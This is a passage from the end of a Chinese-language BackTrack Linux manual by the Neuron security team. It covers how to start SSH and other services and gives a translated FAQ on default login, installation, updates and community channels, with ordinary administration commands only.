启动 SSHD 非常简单,到系统菜单的“Backtrack”——“services”——“SSHD”——
点击“sshd start”即可启动,然后我们使用 root 用户就可以远程连接 backtrack 了,当然为了
安全还是自己另外创建一个用户为好。
第二节. 启动 VNC 服务
使用 VNC 服务我们也可以远程连接 backtrack 系统,VNC 服务在 backtrack4中是已经安
装好的,但是在 backtrack5中已经没有 VNC 了。在 backtrack 4中启动 VNC 服务非常简单,
大家自己猜猜。
第三节. 启动 TFTP 服务
使用 TFTP 服务我们也可以给 backtrack 系统传输文件,TFTP 服务在 backtrack4中是已
经安装好的,但是在 backtrack5中也没有 TFTP 了。在 backtrack 4中启动 TFTP 服务非常简
单,大家自己猜猜。
第四节. 启动其他服务
我想是大概为了方便渗透的原因吧,BackTrack 系统自带了很多常用的应用服务如 Apache, SSH,
MySQL, VNC等等,不过默认都是禁止启动的,如果您想要启动这些服务可以使用下面的命令,下面是启
动 SSH服务。
root@bt:~# sshd-generate 第一次使用 SSH 时,先要生成一个密钥。
root@bt:~# /etc/init.d/ssh start 启动 ssh服务
root@bt:~# /etc/init.d/ssh stop 停止 ssh服务
root@bt:~#
Neuron security team【N.S.T】 第191/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
使用 update-rc.d 命令把您需要的服务设置为随系统自动启动。
root@bt:~# update-rc.d -f ssh defaults
Adding system startup for /etc/init.d/ssh ...
/etc/rc0.d/K20ssh -> ../init.d/ssh
/etc/rc1.d/K20ssh -> ../init.d/ssh
/etc/rc6.d/K20ssh -> ../init.d/ssh
/etc/rc2.d/S20ssh -> ../init.d/ssh
/etc/rc3.d/S20ssh -> ../init.d/ssh
/etc/rc4.d/S20ssh -> ../init.d/ssh
/etc/rc5.d/S20ssh -> ../init.d/ssh
root@bt:~#
第十四章. Miscellaneous 杂项工具
Neuron security team【N.S.T】 第192/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
第十五章. 常见的问题
1. 我只是安装了 BackTrack,它的密码是什么呢?
默认的用户名是“root”,默认密码是“toor”,我们还建议您尽快改变这个默认密码,更改后请重新
启动和验证一切正常,您可以运行以下命令来修改密码,根据提示进行即可。
2. 为什么我在输入密码的时候没有显示呢?
当您在输入密码的时候,没有任何显示的屏幕上。这是一项安全措施,以防止有人通过“shoulder
surfing”看到您密码的长度, 从而使得更加难以猜测您的密码,shoulder surfing 可以翻译为“肩窥”指
(站在别人身后)越过肩膀探看别人操作获取信息的做法。
3. 为什么选择 Ubuntu 作为 BackTrack 的基础?
很多人问我为什么选择 Debian 作为 backtrack 的基础系统,甚至有人沮丧的说 Ubuntu 是菜鸟们用的
系统啊。其理由很简单。
在去年 Defcon 的人跟踪他们的网络的 User Agents, 而我被整个 Defcon 会场大规模使用 BackTrack 的
状况震惊了。由于在几个星期前发现了 wget 的缺陷,大家正在运行的 BackTrack 可能受到波及,这当然
只是一个例子。
主要的一点是,已经有超过300万的用户下载了 BackTrack,而没有一个是接受任何安全更新或补丁
的,而发布是没有维护的。还有财富500强和政府机构把 BackTrack 作为其主要的测试平台,所以我们感
觉到必须解决这个情况,使得 BT4成为一个带有安全和工具更新的发布版。这从字面上鼓舞了 BT4从
Live CD 到一个完全成熟的发布版。简单来说,选择 ubuntu 作为基础系统,只是为了很好的管理安全更
新。
4. 怎么样才能打开图形界面?
在使用 DVD、USB 或 HDD 启动之后,输入以下命令即可进入 GUI 界面。
Startx
5. BackTrack 能免费下载吗?
是可以免费下载的,而且永远都是。
6. 我刻录了 BackTrack 的系统,为什么它不能启动呢?
出现这个问题,有三种原因是最常见的,第一是您下载的 ISO 文件包的 md5值是错误的,第二是您
的刻录软件出现问题,最后可能是您使用的 DVD 光盘质量不好,在您寻找帮助的时候请先检查这些东
西。
7. 使用 BackTrack 会不会把我的 Windows 搞坏呢?
BackTrack 可以以 live DVD 的方式运行而不会影响到您的 Windows。如果您运行了 installer 来安装到
硬盘 ,您要选择好正确的分区。如果选错了分区,可能会导致您原有的系统损坏。
Neuron security team【N.S.T】 第193/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
8. 使用 root 来运行是不是很愚蠢的呢?
很多 BackTrack 里面的工具都需要 root 的权限来运行。BackTrack 是一个专业的渗透测试发布版。我
们相信我们的用户都知道以 root 用户来运行的安全风险。
9. 怎么样才能完美的运行 BackTrack?
Every one’s version of perfect is different. There is no perfect computer. Please check the
forums where users post their thoughts on models of computers.
Please remember to add yours to the list too
10. 哪里有 BackTrack 的使用手册?
There is no manual. We do write official documentation on how to install BackTrack and how
to use some of the more exotic tools, however, we do not write guides on hacking in general. We
have a forum community and a wiki which both contain many user and dev team submitted tutorials.
Please also remember to check the manual section of the website for more info on official
documentation.
11. 你们有提供正式的技术训练吗?
请浏览 Offensive Security Training 网站,这是唯一一个 BackTrack 官方的训练网站, By
the way,在中国还没有 offensive security 的合作伙伴,但是如果您在广州,那么您可以参加
NST 为期两个月的技术特训营,请加 BackTrack DreamWorks QQ 群:74293375。
12. 我在哪里可以找到更多关于 BackTrack 的信息?
请关注我们的 blog,、或 forums and check for BackTrack Fixes here. 另外可以加入
BackTrack DreamWorks QQ 群:74293375。
13. 为什么不能把 BackTrack 的库加到 Ubuntu 里面安装?
We highly recommend against this action because BackTrack tools are built with many custom
features, libraries and kernel. We have no way of knowing how they will preform on a non
BackTrack distribution, plus you will very quickly break your install.
Also if you chose to add the ubuntu repositories to your BackTrack install, you will most
certainly break your entire BackTrack install very quickly.
We do a lot of testing to ensure that all packages in our Repository will work together without
causing problems.
If you decide on this course of action you do so entirely at your own risk and the BackTrack
team will not offer any support in any way.
14. 为什么在 BackTrack 启动之后网卡没有激活?
BackTrack is a penetration testing distribution and as such DHCP requests etc entering the
network when you boot are usually very undesirable. You can easily enable networking by issuing
the following command: /etc/init.d/networking start
Neuron security team【N.S.T】 第194/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
15. 为什么 BackTrack 不能在 VMWare 或 Virtual box 里面使用无线网卡“X”?
Any virtualisation software can only use USB wireless network cards as physical devices, all
other types of wireless card are seen as virtual ethernet devices and can only be seen as a wireless
device by the host and not by the guest operating system. So if you want to run BackTrack in
VMWare or Virtualbox and have full wireless capabilities, make sure you are using a USB device.
16. 为什么不像以前那样发布 USB 镜像了?
这是由于以前的版本要安装到 U 盘的方法很复杂,所以我们才提供了方便易于安装的 USB 专用镜像。但是随着
BackTrack 最新版本的发布我们已经取消了 USB 这样的版本,因为新的版本可以很容易地安装到 U 盘,可以使用
Unetbootin 工具来安装。
17. 我怎么样才能联系你们 ?
To be honest, in the majority of cases you really don't need to.
Firstly consider this, we each get hundreds of emails and Private Messages both on the forums
and in our IRC channel every day. Almost all of these messages are from people asking simple
questions that are either covered in this wiki, FAQ or on the forum itself. Almost every single one of
those is a question that should be asked on the forum as it is either covered there, or the question
and it's subsequent answer would be of benefit to the entire community rather than just the person
asking it. Think of it this way, if you are asking this question, wouldn't it make sense that somebody
else may have the same question or may have already asked it. The forum and wiki are valuable
sources of information, and that information is only as good as the questions asked and the answers
given.
Secondly, all of the team are volunteers, none of us are paid to work on the project and all of us
have lives, family, work etc etc outside of BackTrack. We all give our free time to the project and
the more of that which is taken up answering these questions is less time we have to work on
making BackTrack even better than it is.
So in short, if your question falls into the description above, then it's in your interest not to
email or send a Private Message. It will most likely just get ignored if it does fall into this category.
However, if there is a something not covered by the above, then by all means do contact us.
You can find all of the dev team in our IRC channel (remember we don't live there all the time),
in the forums or contact details on the About page of the website.
在中国您可以和我们进行 backtrack 的交流,请加 BackTrack DreamWorks QQ 群:
74293375。
18. 你们使用什么 IRC 频道来交流 ?
If you would like to join the community and contribute, visit us on irc.freenode.net, in channel
#BackTrack-linux. Our website will continue to be the main source for all news and updates
regarding BackTrack. Be sure to see our channel rules read the channel topic and remember that
you need to be registered to speak.
Important: root ( *root*@* ) is banned by default on this channel, so please ensure you
configure your irc client appropriately.
By the way,IRC 可能您不会用,或者不习惯使用,在中国我们可以通过 QQ 群的方式
进行实时的交流,请加 BackTrack DreamWorks QQ 群:74293375。
19. Linux 的新手能把 BackTrack 当作一个好的起点吗?
Neuron security team【N.S.T】 第195/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
BackTrack 官方对于这个问题是否定的,BackTrack 是一个高度专业化的发行版,它减掉了很多在正
常发行版中的功能。所以我们建议您不要把 BackTrack 作为您的第一个的 Linux 系统。
建议您一开始先下载一个 Kubuntu (它类似于一个基本的 BackTrack 系统) ,然后强迫自己所有的电脑
操作都在 Kubuntu 上面进行,最好是大部分时间花在使用命令行工具上。当且仅当您可以执行任意命令
而无需去查找时,您才应该转到 BackTrack 上面来。
但不要以我们这句话,而认为您不应该使用 BackTrack,请把这些话当作是友好的建议,在您使用
BackTrack 之前如果您不能很好的管理您的 Linux 电脑,您将使自己陷入痛苦和沮丧的世界当中。
20. 我刚下载了最新的 BackTrack,我需要更新吗?
虽然您已经下载了 ISO 或 VM 最新版本,这并不意味着您将拥有我们所提供最新的软件包。
BackTrack 是不断发展和更新的, 基于这个原因您还是应该定期更新您的 BackTrack 与保持自己到最新的
软件包。
21. BackTrack 的库是否常常更新?
一般来说,BackTrack 库和新软件会在星期天的晚上更新,星期一上午就可以下载了。 而当我们觉
得某些包需要马上发布, 而不是等到下个星期天更新才发布,如一些高危漏洞的补丁包,在这些情况下
随时都可能会更新 BackTrack 的库,可能是白天或晚上。
要注意当库这种同步时不能下载软件包, 但这个过程不需要很长时间。
22. 如何更新 BackTrack 系统?
首先必须确认您已经连接到了互联网,然后使用以下命令更新:
root@bt:~# apt-get update
root@bt:~# apt-get upgrade
您还可以选择运行以下命令,效果一样:
root@bt:~# apt-get update
root@bt:~# apt-get dist-upgrade
23. 在哪里可以找到 BackTrack 里面所有工具列表?
目前还没有这样的资源,但是您可以看到您的系统上安装运行的所有软件包列表:
dpkg –list
这将列出在系统中安装的所有软件包,而不只是工具,您还可以使用下面命令搜索感兴趣的
软件包。
apt-cache search <keyword of interest>
Neuron security team【N.S.T】 第196/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼
蓝盾·中国
BLUEDON
蓝盾信息安全技术股份有限公司
地 址:广州市天河区科韵路16号信息港 A栋20-21楼
邮 编:510631
总 机: 020-85526663
传 真: 020-85526000
免费咨询:800-830-3187
http://www.ngsst.com www.bluedon.com
Email:[email protected]
Bluedon Information Security Technology Co., Ltd.
20F-21F, A Building, Information Port,No.16,KeYun Road Tianhe district Guangzhou Guangdong,
P.R.C
Postcode: 510631
Phone: 86-20-85526663
Fax: 86-20-85526000
Neuron security team【N.S.T】 第197/197页
http://www.bluedon.com 广东省广州市天河区信息港 A栋20-21楼